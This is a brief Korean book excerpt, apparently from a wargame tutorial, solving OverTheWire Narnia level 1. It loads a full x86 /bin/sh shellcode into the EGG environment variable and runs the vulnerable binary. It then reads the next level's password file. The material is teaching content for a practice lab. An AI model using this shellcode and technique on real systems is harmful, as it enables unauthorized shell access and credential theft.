더북(TheBook)

환경 변수 EGG에 셸 코드Shellcode를 저장할 수 있다면, 어떤 셸 코드든 실행할 수 있다. 가장 쉬운 방법은 /bin/sh의 셸 코드를 가져와 환경 변수 EGG에 설정하는 것이다.

이번 예제에서는 /bin/sh의 셸 코드로 http://shell-storm.org/shellcode/files/shellcode-811.php를 사용할 것이다.

narnia1@melinda:/narnia$ export EGG=`python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"'`

$ ./narnia1

$ cat /etc/narnia_pass/narnia2

▲ 그림 1-8 Narnia 1 - 익스플로이트

 

이제 narnia2 계정의 패스워드를 획득했으니 3단계로 넘어갈 수 있다.

신간 소식 구독하기
뉴스레터에 가입하시고 이메일로 신간 소식을 받아 보세요.